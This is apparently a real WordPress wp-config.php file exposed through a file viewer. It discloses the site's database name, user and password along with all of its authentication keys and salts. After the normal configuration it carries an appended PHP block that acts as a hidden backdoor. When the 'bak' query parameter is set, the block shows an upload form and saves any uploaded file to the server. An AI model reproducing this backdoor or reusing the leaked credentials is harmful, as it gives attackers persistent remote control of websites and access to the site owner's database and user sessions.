View file File name : wp-config.php Content :<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'guideinstitutsbe_wp_ds4ii'); /** Database username */ define('DB_USER', 'guideinstitutsbe_wp_hwgnb'); /** Database password */ define('DB_PASSWORD', 'R@&cJw5EcR1IK9BK'); /** Database hostname */ define('DB_HOST', 'localhost:3306'); /** Database charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'Zt#6A8y[HCYn_hxR6)4!;n5CS6r4H1k2!bbc*6VNY;]S](M!1Ztqa/XYRu~//Kmt'); define('SECURE_AUTH_KEY', 'uo;5S|Hjte6_VX62WQe@)G00O5a7ylIH(W30Sa@Z_dlyXhX&e/4m6/7j90#A/Vt_'); define('LOGGED_IN_KEY', 'A~5YpNZ[Z%W1h50wN0t4|2PA1&J;xG&pJ-i4a!_J:Q;#3eQ390(N1s49E1e373qA'); define('NONCE_KEY', '9z]s9~i5qs+]2;IS&P!IHP~@)3+K;s7F633@I62!Bh~2zdV:Di:Ro(D4190%VAdP'); define('AUTH_SALT', 'wqYDz/Sc*t2:%6AKi6Pip0Q7Z3E|W#P9ou+57o/f-Q*)f2A_5+b~v265;5[g3b@I'); define('SECURE_AUTH_SALT', '-rg)#B@gv0!1x]s7Y;)!U+5AxB54F]eDyCqN@6RUe2UhO6cJu0W0)X~7OwQh1IA_'); define('LOGGED_IN_SALT', 'Ulbx47itc+z7MHNi8T#*f0N!9Lip@GaC:_IO!81/wRM]W8F2OiXYV[96F~94|:0P'); define('NONCE_SALT', 'jD01~70~|[1a[Uj2o29bWEwf1tbIut5JdJgN|E8AgB:m8WR(vU/OCQehW5AisuvG'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'N6pD2RbJl_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'WP_DEBUG_DISPLAY', false ); define( 'WP_CACHE_KEY_SALT', '8571180a431bc184f712f01a6edd7c14' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?>